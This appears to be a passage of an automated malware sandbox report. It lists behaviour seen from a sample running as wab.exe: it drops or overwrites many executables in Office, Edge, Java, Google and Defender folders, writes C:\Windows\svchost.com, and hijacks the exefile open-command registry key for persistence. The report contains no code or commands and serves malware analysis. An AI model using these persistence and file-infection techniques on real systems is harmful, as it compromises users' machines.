Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com

Boot Survival

Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX (40 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4460
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5418
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5858
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3995
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Windows\svchost.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
